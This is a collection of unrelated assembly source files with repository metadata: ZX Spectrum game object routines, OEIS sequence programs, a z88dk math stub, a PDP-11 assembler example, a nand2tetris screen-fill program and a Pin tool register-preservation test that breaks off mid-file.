fdd6bdb5775933756e75402a7c6be80d5334702d

[ "Apache-2.0" ]

67

2017-10-07T18:48:05.000Z

2022-02-01T20:37:40.000Z

src/objects.asm

fjpena/sword-of-ianna-zx

fdd6bdb5775933756e75402a7c6be80d5334702d

[ "Apache-2.0" ]

null

src/objects.asm

fjpena/sword-of-ianna-zx

fdd6bdb5775933756e75402a7c6be80d5334702d

[ "Apache-2.0" ]

9

2017-10-06T21:02:55.000Z

2022-01-06T03:11:58.000Z

; Object struct ; - Byte 0: object state: 0: off; 1: switching on / dead / destroyed; 2: on; 3-255: TBD ; - Byte 1: Object-specific properties. ; 2 bytes per object in the level, 128 max objects per level: 256 bytes OBJECT_DATA: EQU $FF00 ; Object types OBJECT_NONE EQU 0 OBJECT_SWITCH EQU 1 OBJECT_DOOR EQU 2 OBJECT_DOOR_DESTROY EQU 3 OBJECT_FLOOR_DESTROY EQU 4 OBJECT_WALL_DESTROY EQU 5 OBJECT_BOX_LEFT EQU 6 OBJECT_BOX_RIGHT EQU 7 OBJECT_JAR EQU 8 OBJECT_TELEPORTER EQU 9 ; Pickable object types OBJECT_KEY_GREEN EQU 11 OBJECT_KEY_BLUE EQU 12 OBJECT_KEY_YELLOW EQU 13 OBJECT_BREAD EQU 14 OBJECT_MEAT EQU 15 OBJECT_HEALTH EQU 16 OBJECT_KEY_RED EQU 17 OBJECT_KEY_WHITE EQU 18 OBJECT_KEY_PURPLE EQU 19 ; Object types for enemies OBJECT_ENEMY_SKELETON EQU 20 OBJECT_ENEMY_ORC EQU 21 OBJECT_ENEMY_MUMMY EQU 22 OBJECT_ENEMY_TROLL EQU 23 OBJECT_ENEMY_ROCK EQU 24 OBJECT_ENEMY_KNIGHT EQU 25 OBJECT_ENEMY_DALGURAK EQU 26 OBJECT_ENEMY_GOLEM EQU 27 OBJECT_ENEMY_OGRE EQU 28 OBJECT_ENEMY_MINOTAUR EQU 29 OBJECT_ENEMY_DEMON EQU 30 OBJECT_ENEMY_SECONDARY EQU 31 ; functions for inactive objects inactive_obj_functions: dw inactive_none, inactive_switch, inactive_door, inactive_door_destroy, inactive_floor_destroy, inactive_wall_destroy, inactive_box_left, inactive_box_right, inactive_jar, inactive_teleporter ; script ids per pickable object scripts_per_pickable_object: db 8, 5, 3, 10, 4, 6, 9, 7, 11 ; FIXME check this!!! tiles_per_pickable_object: db 217, 218, 219, 220, 221, 222, 223, 224, 225 ; Init object table ; Basically clean it up. ; ; INPUT: none InitObjectTable: ld hl, OBJECT_DATA ld de, OBJECT_DATA+1 xor a ld (hl), a ld bc, 255 ldir ret ; Load objects in a room ; INPUT: ; - IX: pointer to object definition LoadObjects: inc ix ; skip the player script LoadObjects_enemy1: ld iy, ENTITY_ENEMY1_POINTER call load_enemy jr nc, LoadObjects_enemy2 ld bc, 12 jr LoadObjects_object1_add LoadObjects_enemy2: ld bc, 6 add ix, bc ; go to enemy 2 ld iy, ENTITY_ENEMY2_POINTER call load_enemy LoadObjects_object1: ld bc, 6 LoadObjects_object1_add: add ix, bc ; go to object 1 ld iy, ENTITY_OBJECT1_POINTER call load_object LoadObjects_object2: ld bc, 6 add ix, bc ; go to object 2 ld iy, ENTITY_OBJECT2_POINTER call load_object LoadObjects_object3: ld bc, 6 add ix, bc ; go to object 3 ld iy, ENTITY_OBJECT3_POINTER call load_object LoadObjects_object4: ld bc, 6 add ix, bc ; go to object 4 ld iy, ENTITY_OBJECT4_POINTER call load_object LoadObjects_object5: ld bc, 6 add ix, bc ; go to object 5 ld iy, ENTITY_OBJECT5_POINTER call load_object ; Cleanup scratch area for scripts here ld hl, scratch_area_player ld de, scratch_area_player+1 xor a ld (hl), a ld bc, 63 ldir ret ; Load an enemy ; INPUT: ; - IX: pointer to enemy definition ; - IY: pointer to enemy entity ; RETURNS: ; - Carry flag set: there was a secondary enemy. Reset: no secondary enemy load_enemy: ld a, (ix+1) ; object type and a ; if 0, object is not present jr nz, load_enemy_present load_enemy_not_present: xor a ld (iy+0), a ld (iy+1), a ; Sprite address is 0000, so no enemy ld (iy+4), a ; no energy ret load_enemy_present: ; first, check object id and see if there is any energy left. Otherwise, do not create object. ld a, (ix+0) ; get the object id add a, a ; *2 to index the array ld h, $FF ld l, a ; address the array ld a, (hl) ; get the object state. For enemies, 0 will mean still alive, non-zero will mean dead and a jr nz, load_enemy_not_present ; if non-zero, no enemy to load push hl ; Enemy there, lets get ready call NewSprite ; get address of new sprite in HL ld a, h or l ; if HL=0, cannot create new sprites. THIS SHOULD NOT HAPPEN! jr z, load_enemy_not_present ld a, l ld (iy+0), a ld a, h ld (iy+1), a ; store sprite address ld de, enemy_base_sprite ld (hl), e inc hl ld (hl), d ; Store animation position inc hl ld (hl), SPR_24x32_MIRROR ; sprite type inc hl ld a, (ix+2) ; X, in stile coords. We need to multiply by 16 add a, a ; *2 add a, a ; *4 add a, a ; *8 add a, a ; *16 ld (hl), a ; X inc hl ld a, (ix+3) ; Y, in stile coords. We need to multiply by 16 add a, a ; *2 add a, a ; *4 add a, a ; *8 add a, a ; *16 ld (hl), a ; Y inc hl ld (hl), 3 ; 3 chars in X FIXME should we consider different sizes??? Maybe depending on the enemy type inc hl ld (hl), 4 ; 4 chars in Y FIXME should we consider different sizes??? Maybe depending on the enemy type inc hl ld (hl), 1 ; redraw pop hl inc hl ; point to the energy value ld a, (ix+1) ; object type sub OBJECT_ENEMY_SKELETON ; make it base 0 rlca rlca rlca rlca ; move to the high nibble or (ix+4) ; A = enemy_type | enemy_level ld (iy+10), a ; and store it! call get_entity_max_energy ld (iy+4), a ; store the enemy energy in A ld a, (ix+5) ; script id ld (iy+2), a ; store script id ld (iy+3), 0 ; and set 0 as the current address in script ld a, (ix+0) ; object id ld (iy+9), a ; and store it ; Now, lets check if this enemy requires a secondary entity ld a, (ix+1) ; object type cp OBJECT_ENEMY_GOLEM jr z, load_enemy_secondary cp OBJECT_ENEMY_OGRE jr z, load_enemy_secondary cp OBJECT_ENEMY_MINOTAUR jr z, load_enemy_secondary cp OBJECT_ENEMY_DEMON jr z, load_enemy_secondary xor a ; No secondary enemy ret load_enemy_secondary: push ix ld iy, ENTITY_ENEMY2_POINTER call NewSprite ; get address of new sprite in HL ld a, h or l ; if HL=0, cannot create new sprites. THIS SHOULD NOT HAPPEN! jp z, load_enemy_not_present ld (iy+0), l ld (iy+1), h ; store sprite address ld (iy+2), 2 ; script id for ACTION_SECONDARY xor a ld (iy+3), a ; script position ld (iy+4), a ; energy ld (iy+5), STATE_SECONDARY_LEFT ld (iy+6), a ; animation position ld (iy+7), a ld (iy+10), OBJECT_ENEMY_SECONDARY*16-OBJECT_ENEMY_SKELETON*16 ; now the sprite ld ix, ENTITY_ENEMY1_POINTER ld e, (ix+0) ld d, (ix+1) ; DE has the original sprite ld ixh, d ld ixl, e ; IX: original sprite ex de, hl ld iyh, d ld iyl, e ; IY: new sprite ld a, (ix+2) ld (iy+2), a ; sprite type ld a, (ix+3) ld (iy+3), a ; xpos ld a, (ix+4) sub 32 ld (iy+4), a ; ypos ld e, (ix+0) ld d, (ix+1) ; sprite address. The sprite for the secondary one is primary+3936 ld hl, 3936 add hl, de ld (iy+0), l ld (iy+1), h ; and place in the sprite ld a, (ix+5) ld (iy+5), a ; x chars ld a, (ix+6) ld (iy+6), a ; y chars ld (iy+7),1 ; force redraw pop ix scf ; there is a secondary enemy ret ; Load an object ; INPUT: ; - IX: pointer to object definition ; - IY: pointer to object entity load_object: ld a, (ix+1) ; object type and a ; if 0, object is not present jr nz, load_object_present load_object_not_present: xor a ld (iy+0), a ld (iy+1), a ; Sprite address is 0000, so no object ld (iy+4), a ; no energy ret load_object_present: ; common object load ld (iy+0), $ff ld (iy+1), $ff ; Objects will use $ffff as the sprite address (unused) ld a, (ix+0) ; Object id ld (iy+5), a ; Store object id ld a, (ix+2) ; X in stile terms ld (iy+6), a ; and store ld a, (ix+3) ; Y in stile terms ld (iy+7), a ; and store ld a, (ix+1) ld (iy+8), a ; object type ld a, (ix+5) ; script id ld (iy+2), a ; store script id ; first, check object id and see its state. If 0, it will be active, otherwise inactive ld a, (ix+0) ; get the object id add a, a ; *2 to index the array ld h, $FF ld l, a ; address the array ld a, (hl) ; get the object state. For objects, 0 will mean still alive (default), non-zero will mean inactive and a jr nz, load_object_inactive load_object_active: ld a, (ix+4) ; energy ld (iy+4), a ; ld (iy+3), 0 ; and set 0 as the current address in script ret load_object_inactive: ; This is the funny (and tricky) part. Inactive objects mean switches already switched on, doors already open... We need to do several things: ; First, update the tiles accordingly, as if we were executing its state change ; Second, update the hardness map ; Third, make sure the script offset is appropriate ; and store the remaining properties ; first some common stuff ld (iy+4), 0 ; energy for inactive objects will always be 0 ld a, (ix+1) ; retrieve object type add a, a ; *2 to index array ld c, a ld b, 0 ld hl, inactive_obj_functions add hl, bc ; hl points to the function ld e, (hl) inc hl ld d, (hl) ld (load_object_inactive_call+1), de load_object_inactive_call: call 0 ; call the object-specific function to set the right properties inactive_none: ret ; All inactive object functions receive the following parameters: ; INPUT: ; - IX: pointer to object definition ; - IY: pointer to object entity ; They must deal with the tilemap, hardness map and script offset inactive_switch: ; now, get back and update the supertile ld a, (iy+6) ; X in stile coords ld b, a ld a, (iy+7) ; Y in stile coords ld c, a push bc ld hl, TILEMAP_SUPERTILES ; we need to address the map at C*16+B ld a, c rrca rrca rrca rrca and $f0 or b ld e, a ld d, 0 add hl, de ; HL now points to the supertile ld a, (hl) ; THIS is the supertile to increment add a, 2 ; FIXME WE ARE ASSUMING TILES FOR SWITCHES TO BE ONE AFTER ANOTHER!! ld (hl), a ; save the updated supertile. Now we just have to update it on screen push af ld de, 16 add hl, de ; go to next row ld a, (hl) add a, 2 ld (hl), a ; and increase it as well ld (saveA), a pop af pop bc ; As a last step, we should place the script offset accordingly. ; For switches, it will ALWAYS be 4, since their script must be: wait for condition, associated condition, turn switch, switch id ld (iy+3), 4 ; and set 0 as the current address in script ret inactive_door_destroy: ld b, (iy+6) ; X in stile coords ld c, (iy+7) ; Y in stile coords ; dec a ; ld c, a dec c ld hl, TILEMAP_SUPERTILES ; we need to address the map at C*16+B ld a, c rrca rrca rrca rrca and $f0 or b ld e, a ld d, 0 add hl, de ; HL now points to the supertile xor a ld de, 16 ld (hl), a add hl, de ld (hl), a add hl, de ld (hl), a ; now set the hardness to empty call SetHardness inc c xor a call SetHardness inc c xor a call SetHardness ; As a last step, we should place the script offset accordingly. ; For breakable doors, deactivate script deact_script: xor a ld (iy+3), a ; and set 0 as the current address in script ld (iy+2), a ; set script to ACTION_NONE ret inactive_jar: ld b, (iy+6) ; X in stile coords ld c, (iy+7) ; Y in stile coords ld hl, TILEMAP_SUPERTILES ; we need to address the map at C*16+B ld a, c rrca rrca rrca rrca and $f0 or b ld e, a ld d, 0 add hl, de ; HL now points to the supertile xor a ld de, 16 ld (hl), a ; now set the hardness to empty call SetHardness ; As a last step, we should place the script offset accordingly. ; For jars, deactivate script jp deact_script inactive_door: ld b, (iy+6) ; X in stile coords ld a, (iy+7) ; Y in stile coords add a, 3 ld c, a ld hl, TILEMAP_SUPERTILES ; we need to address the map at C*16+B ld a, c rrca rrca rrca rrca and $f0 or b ld e, a ld d, 0 add hl, de ; HL now points to the supertile ld a, (hl) ld de, -48 add hl, de ; so it is the end of the door ld (hl), a ld de, 16 add hl, de ; next line xor a ld (hl), a add hl, de ld (hl), a add hl, de ld (hl), a ; and set the remaining three chars as blank ; now set the hardness to empty dec c dec c xor a call SetHardness inc c xor a call SetHardness inc c xor a call SetHardness ; As a last step, we should place the script offset accordingly. ; For doors, it will ALWAYS be 4, since their script must be: wait for condition, associated condition, turn door, door id ld (iy+3), 4 ; and set 0 as the current address in script ret inactive_floor_destroy: inactive_wall_destroy: inactive_teleporter: ret inactive_box_left: ld b, (iy+6) ; X in stile coords ld c, (iy+7) ; Y in stile coords ld hl, TILEMAP_SUPERTILES ; we need to address the map at C*16+B ld a, c rrca rrca rrca rrca and $f0 or b ld e, a ld d, 0 add hl, de ; HL now points to the supertile ld de, 16 xor a ld (hl), a inc hl ld (hl), a add hl, de ld (hl), a dec hl ld (hl), a ; and clean up the four boxes call SetHardness inc b xor a call SetHardness inc c xor a call SetHardness dec b xor a call SetHardness ; As a last step, we should place the script offset accordingly. ; For boxes, deactivate script jp deact_script inactive_box_right: ld b, (iy+6) ; X in stile coords ld c, (iy+7) ; Y in stile coords ld hl, TILEMAP_SUPERTILES ; we need to address the map at C*16+B ld a, c rrca rrca rrca rrca and $f0 or b ld e, a ld d, 0 add hl, de ; HL now points to the supertile ld de, 16 xor a ld (hl), a dec hl ld (hl), a add hl, de ld (hl), a inc hl ld (hl), a ; and clean up the four boxes call SetHardness dec b xor a call SetHardness inc c xor a call SetHardness inc b xor a call SetHardness ; As a last step, we should place the script offset accordingly. ; For boxes, deactivate script jp deact_script ; Check if we are hitting a breakable object ; In that case, reduce its energy and make it break if required ; INPUT: ; - B: X coord in stiles ; - C: Y coord in stiles check_break_object: ld iy, ENTITY_OBJECT1_POINTER ld l, 5 ; loop counter ld de, ENTITY_SIZE check_break_object_loop: ld a, (iy+0) or (iy+1) jr z, check_break_object_loop_continue ; so the object is active, does the position match? ld a, (iy+6) cp b ; same X stile? jr nz, check_break_object_loop_continue ld a, (iy+7) cp c jr nz, check_break_object_loop_continue ; cool, so the position matches ld a, (iy+8) ; object type cp OBJECT_BOX_LEFT ; is it a box? FIXME there will be more breakable objects!!! jr z, check_break_object_loop_gotit cp OBJECT_BOX_RIGHT jr z, check_break_object_loop_gotit cp OBJECT_DOOR_DESTROY jr z, check_break_object_loop_gotit cp OBJECT_WALL_DESTROY jr z, check_break_object_loop_gotit cp OBJECT_JAR jr nz, check_break_object_loop_continue check_break_object_loop_gotit: ; so... we got it!!! ld (iy+4), 0 ; no energy ld a, (iy+5) ; object id add a, a ld h, $ff ; The object area starts on $FF00, easy! ld l, a ; HL is pointing to the position ld (hl), 1 ; 1 means dead! ; and use the broken object FX ld a, FX_DESTROY_BLOCK call FX_Play ret ; and return check_break_object_loop_continue: dec l jr z, check_break_object_loop_notfound add iy, de jr check_break_object_loop check_break_object_loop_notfound: ret ; Get entity max energy, based on its level ; Input: ; - IY: pointer to entity ; OUTPUT: ; - A: energy ; Will preserve all registers get_entity_max_energy_ix: push ix pop iy get_entity_max_energy: push hl push de push bc ld a, iyl cp ENTITY_PLAYER_POINTER % 256 ; is this the player? jr z, get_player_max_energy ld a, (iy+10) ; get enemy type | enemy_level ld c, a ; store in C and $f0 ; this is enemy type * 16 ld hl, enemy_info ; pointer base ld e, a ld d, 0 ; And now multiply by 32 to get there rl e rl d ; enemy_type * 32 add hl, de ; HL now points to the right enemy ld b, 0 ; C has the level, so we get to the proper position ld a, c and $0f ld c, a ; A = enemy_level add hl, bc ld a, (hl) ; And now A has the energy for the current enemy/level jr get_entity_max_energy_done get_player_max_energy: ld a, (player_level) ld e, a ld d, 0 ld hl, barbarian_max_energy add hl, de ld a, (hl) ; this is the barbarian max energy get_entity_max_energy_done: pop bc pop de pop hl ret ; Get max player experience for the current level ; OUTPUT: ; - A: max exp for current level get_player_max_exp: ld a, (player_level) get_player_exp_for_level: ld e, a ld d, 0 ld hl, barbarian_level_exp add hl, de ld a, (hl) ; this is the barbarian max exp for this level ret ; Get enemy probability for an attack, based on its level ; Input: ; - IX: pointer to entity ; - DE: offset: 7 for long attack, 14 for short attack, 21 for block ; OUTPUT: ; - A: probability ; Will preserve all registers get_enemy_probability: push hl push bc ld a, (ix+10) ; get enemy type | enemy_level ld c, a ; store in C and $f0 ; this is enemy type * 16 ld hl, enemy_info ; pointer base add hl, de ; HL points to the right base ld e, a ld d, 0 ; And now multiply by 32 to get there rl e rl d ; enemy_type * 32 add hl, de ; HL now points to the right enemy ld b, 0 ; C has the level, so we get to the proper position ld a, c and $0f ld c, a ; A = enemy_level add hl, bc ld a, (hl) ; And now A has the probability pop bc pop hl ret ; Get enemy attack ; Input: ; - IX: pointer to entity ; - DE: offset: 0 for short1 attack, 1 for short2 attack, 2 for long attack ; OUTPUT: ; - A: script id ; Will preserve all registers get_enemy_attack: push hl ld a, (ix+10) ; get enemy type | enemy_level and $f0 ; this is enemy type * 16 ld hl, enemy_info+28 ; pointer base add hl, de ; + attack type ld e, a ld d, 0 ; And now multiply by 32 to get there rl e rl d ; enemy_type * 32 add hl, de ; HL now points to the right enemy ld a, (hl) ; And now A has the attack pop hl ret ; Get entity attack damage ; Input: ; - (entity_current): pointer to current (attacking) entity ; - IX: pointer to receiving entity ; OUTPUT: ; - E: damage weapon_damage: db 0,1,2,4 get_entity_attack_damage: push hl push af ld hl, (entity_current) ld a, ENTITY_PLAYER_POINTER % 256 cp l ; is this the player? jr z, get_player_attack_damage ; for enemies, the attack damage is the level (*2 if the player is not carrying a weapon) ld de, 10 add hl, de ld a, (hl) ; the low nibble is the enemy level and $0f inc a ld e, a ; and we have it in E in base 1 (remember levels start by 0) ld a, (ix+5) ; this is the receiving entity state cp STATE_UNSHEATHE_LEFT jr nc, get_entity_attack_damage_finished ; we are carrying a weapon, so no double damage ld a, e add a, e ld e, a ; E*2 jr get_entity_attack_damage_finished get_player_attack_damage: ; for the player, the attack damage is level + weapon-damage ld hl, weapon_damage ld a, (player_current_weapon) ld e, a ld d, 0 add hl, de ld a, (hl) ; so A has the weapon damage level ld e, a ld a, (player_level) inc a add a, e ld e, a ; done, E is the damage level get_entity_attack_damage_finished: pop af pop hl ret

23.92711

216

0.688472

6a2fa26f55db39e5731793b23f58db481f5ecb96

634

asm

Assembly

oeis/154/A154968.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/154/A154968.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/154/A154968.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A154968: a(n) = 4*a(n-1) + 12*a(n-2), n>2 with a(0)=1, a(1)=1, a(2)=7. ; 1,1,7,40,244,1456,8752,52480,314944,1889536,11337472,68024320,408146944,2448879616,14693281792,88159682560,528958111744,3173748637696,19042491891712,114254951219200,685529707577344,4113178244939776,24679069470687232,148074416822026240,888446500936351744,5330679005609721856,31984074033675108352,191904444202017095680,1151426665212169682944,6908559991272883879936,41451359947637571715072,248708159685824893419520,1492248958114950434258944,8953493748689700458070016,53720962492138207043387392 max $0,1 add $0,1 seq $0,53524 ; a(n) = (6^n - (-2)^n)/8. div $0,4

79.25

492

0.820189

68c6713d4f78eb6462d0d526db5221c57bca62fe

541

asm

Assembly

oeis/073/A073757.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

11

2021-08-22T19:44:55.000Z

2022-03-20T16:47:57.000Z

oeis/073/A073757.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

9

2021-08-29T13:15:54.000Z

2022-03-09T19:52:31.000Z

oeis/073/A073757.asm

neoneye/loda-programs

84790877f8e6c2e821b183d2e334d612045d29c0

[ "Apache-2.0" ]

3

2021-08-22T20:56:47.000Z

2021-09-29T06:26:12.000Z

; A073757: a(n) = d(n) + phi(n) - 1. ; Submitted by Jon Maiga ; 1,2,3,4,5,5,7,7,8,7,11,9,13,9,11,12,17,11,19,13,15,13,23,15,22,15,21,17,29,15,31,21,23,19,27,20,37,21,27,23,41,19,43,25,29,25,47,25,44,25,35,29,53,25,43,31,39,31,59,27,61,33,41,38,51,27,67,37,47,31,71,35,73,39,45,41,63,31,79,41,58,43,83,35,67,45,59,47,89,35,75,49,63,49,75,43,97,47,65,48 mov $2,$0 seq $0,10 ; Euler totient function phi(n): count numbers <= n and prime to n. seq $2,5 ; d(n) (also called tau(n) or sigma_0(n)), the number of divisors of n. add $0,$2 sub $0,1

54.1

289

0.637708

f9ce36a99ddf3345b26083112ac000bc7a47e865

280

asm

Assembly

libsrc/_DEVELOPMENT/math/float/math48/c/sccz80/cm48_sccz80_islessequal_callee.asm

meesokim/z88dk

5763c7778f19a71d936b3200374059d267066bb2

[ "ClArtistic" ]

null

libsrc/_DEVELOPMENT/math/float/math48/c/sccz80/cm48_sccz80_islessequal_callee.asm

meesokim/z88dk

5763c7778f19a71d936b3200374059d267066bb2

[ "ClArtistic" ]

null

libsrc/_DEVELOPMENT/math/float/math48/c/sccz80/cm48_sccz80_islessequal_callee.asm

meesokim/z88dk

5763c7778f19a71d936b3200374059d267066bb2

[ "ClArtistic" ]

null

; int __CALLEE__ islessequal(double x, double y) SECTION code_fp_math48 PUBLIC cm48_sccz80_islessequal_callee EXTERN am48_islessequal, cm48_sccz80p_dcallee2 cm48_sccz80_islessequal_callee: call cm48_sccz80p_dcallee2 ; AC'= y ; AC = x jp am48_islessequal

15.555556

48

0.775

b690119e3f2443cf36241e79ff6b62865e5d994b

639

asm

Assembly

in.asm

HmanA6399/PDP11-Assembler

56ad457bfa5a2b3940530191be096d343ca3ef77

[ "MIT" ]

null

in.asm

HmanA6399/PDP11-Assembler

56ad457bfa5a2b3940530191be096d343ca3ef77

[ "MIT" ]

10

2020-12-19T16:24:13.000Z

2020-12-24T20:15:08.000Z

in.asm

HmanA6399/PDP11-Assembler

56ad457bfa5a2b3940530191be096d343ca3ef77

[ "MIT" ]

null

; this code doesn’t do anything significant, it is just an example MOV N, R0 ; R0 = 7 address 0 XOR R1, R1 ; R1 = 0 address 2 MOV #20, R3 ; R3 = 20 address 3 ; memory is word addressable, so there isno ; problem in having odd addresses, why? Label3: ; address 5 MOV -(R3), M ; M = 5 , R3= 19 address 5 DEC R0 ; R0 = 6 address 7 CMP #18, @R3 ; C=1,N=1 address 8 BHI Label1 ; Not taken address 10 MOV #18,@R3 ; M=18 address 11 Label1: ; address 13 DEC R0 ; R0=5 address 13 BEQ Label2 ; not taken address 14 INC R3 ; R3=20 address 15 Label2: ; address 16 BR Label3 ; address 16 HLT ; address 17 Define N 7 ; address 18 Define M 5 ; address 19

30.428571

66

0.685446

09848212112624af652e896f2ca0fb387e5f4415

1,541

asm

Assembly

04/fill/Fill.asm

alchermd/nand2tetris

e3be9951af0a090e34fd9e6a66e23dca071d148f

[ "MIT" ]

null

04/fill/Fill.asm

alchermd/nand2tetris

e3be9951af0a090e34fd9e6a66e23dca071d148f

[ "MIT" ]

null

04/fill/Fill.asm

alchermd/nand2tetris

e3be9951af0a090e34fd9e6a66e23dca071d148f

[ "MIT" ]

null

// This file is part of www.nand2tetris.org // and the book "The Elements of Computing Systems" // by Nisan and Schocken, MIT Press. // File name: projects/04/Fill.asm // Runs an infinite loop that listens to the keyboard input. // When a key is pressed (any key), the program blackens the screen, // i.e. writes "black" in every pixel; // the screen should remain fully black as long as the key is pressed. // When no key is pressed, the program clears the screen, i.e. writes // "white" in every pixel; // the screen should remain fully clear as long as no key is pressed. (MAIN_LOOP) @8192 D=A @n M=D // n = 8192 @i M=0 // i = 0 @SCREEN D=A @addr M=D // addr = screen's memory address // Get the current key pressed @KBD D=M // Write the screen as black if any key is pressed @WRITE_BLACK D; JGT // Write it as white otherwise @WRITE_WHITE D; JEQ @MAIN_LOOP 0; JMP (WRITE_WHITE) @i D=M @n D=D-M @MAIN_LOOP D; JEQ // if i == n goto MAIN_LOOP @addr A=M M=0 // RAM[addr]=0000000000000000 @i M=M+1 // i++ @addr M=M+1 // addr++ @WRITE_WHITE 0; JMP (WRITE_BLACK) @i D=M @n D=D-M @MAIN_LOOP D; JEQ // if i == n goto MAIN_LOOP @addr A=M M=-1 // RAM[addr]=1111111111111111 @i M=M+1 // i++ @addr M=M+1 // addr++ @WRITE_BLACK 0; JMP

18.566265

72

0.543803

3e59cc5b80cfa92bfc7f331267e66673057c1c14

10,105

asm

Assembly

source/tools/ToolUnitTests/test_iarg_preserve_ia32_win.asm

ganboing/pintool

ece4788ffded47124b1c9b203707cc255dbaf20f

[ "Intel" ]

1

2017-06-06T16:02:31.000Z

source/tools/ToolUnitTests/test_iarg_preserve_ia32_win.asm

ganboing/pintool

ece4788ffded47124b1c9b203707cc255dbaf20f

[ "Intel" ]

null

source/tools/ToolUnitTests/test_iarg_preserve_ia32_win.asm

ganboing/pintool

ece4788ffded47124b1c9b203707cc255dbaf20f

[ "Intel" ]

null

; BEGIN_LEGAL ; Intel Open Source License ; ; Copyright (c) 2002-2016 Intel Corporation. All rights reserved. ; ; Redistribution and use in source and binary forms, with or without ; modification, are permitted provided that the following conditions are ; met: ; ; Redistributions of source code must retain the above copyright notice, ; this list of conditions and the following disclaimer. Redistributions ; in binary form must reproduce the above copyright notice, this list of ; conditions and the following disclaimer in the documentation and/or ; other materials provided with the distribution. Neither the name of ; the Intel Corporation nor the names of its contributors may be used to ; endorse or promote products derived from this software without ; specific prior written permission. ; ; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ; ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT ; LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR ; A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE INTEL OR ; ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, ; SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT ; LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, ; DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY ; THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT ; (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE ; OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ; END_LEGAL PUBLIC Fld1Fstp_a PUBLIC Fld1Fstp_b PUBLIC Fld1Fstp_c PUBLIC Fld1Fstp_d PUBLIC Fld1Fstp_e PUBLIC Fld1Fstp_f PUBLIC Fld1Fstp_f PUBLIC Fld1Fstp_f1 PUBLIC Fld1Fstp_f2 PUBLIC Fld1Fstp_g PUBLIC Fld1Fstp_h PUBLIC Fld1Fstp_i PUBLIC Fld1Fstp_j PUBLIC Fld1Fstp_k PUBLIC Fld1Fstp_l PUBLIC Fld1Fstp_l1 PUBLIC Fld1Fstp_l2 PUBLIC Fld1Fstp_m PUBLIC Fld1Fstp_n PUBLIC Fld1Fstp_o PUBLIC Fld1Fstp_p PUBLIC Fld1Fstp_q PUBLIC Fld1_aa PUBLIC Fld1_ab PUBLIC Fld1_ac PUBLIC Fld1_ad PUBLIC Fld1_ae PUBLIC Fld1_af PUBLIC Fld1_ag PUBLIC Fstp3 PUBLIC Fstp_x PUBLIC Fld1_x PUBLIC IntScratchFld1Fstp_a PUBLIC IntScratchFld1Fstp_b PUBLIC IntScratchFld1Fstp_c PUBLIC IntScratchFld1Fstp_d PUBLIC FldzToTop3 PUBLIC Fld2tToTop3 PUBLIC SetXmmRegsToZero PUBLIC AddToXmmRegs PUBLIC SetIntRegsToZero PUBLIC get_gax PUBLIC get_gbx PUBLIC get_gcx PUBLIC get_gdx PUBLIC get_gdi PUBLIC get_gsi PUBLIC get_gbp PUBLIC set_gax PUBLIC set_gbx PUBLIC set_gcx PUBLIC set_gdx PUBLIC set_gdi PUBLIC set_gsi PUBLIC set_gbp PUBLIC GetMxcsr PUBLIC MaskZeroDivideInMxcsr PUBLIC UnMaskZeroDivideInMxcsr PUBLIC Fld1FstpSetXmmsMaskMxcsr PUBLIC GetFlags PUBLIC SetFlags .686 .XMM .model flat, c extern var1:qword extern var2:qword extern var3:qword extern val1:qword extern val2:qword extern val3:qword extern val4:qword extern val5:qword extern val6:qword extern val7:qword extern val8:qword extern setFlagsX:dword .data dummy QWORD 0, 0, 0 , 0 varDeadBeef DWORD 0deadbeefH, 0deadbeefH, 0deadbeefH, 0deadbeefH .code Fld1Fstp_a PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_a ENDP Fld1Fstp_b PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_b ENDP Fld1Fstp_c PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_c ENDP Fld1Fstp_d PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_d ENDP Fld1Fstp_e PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_e ENDP Fld1Fstp_f PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_f ENDP Fld1Fstp_f1 PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_f1 ENDP Fld1Fstp_f2 PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_f2 ENDP Fld1Fstp_g PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_g ENDP Fld1Fstp_h PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_h ENDP Fld1Fstp_i PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_i ENDP Fld1Fstp_j PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp var3 ret Fld1Fstp_j ENDP Fld1Fstp_k PROC fld1 fld1 fld1 fstp var1 fstp var2 fstp 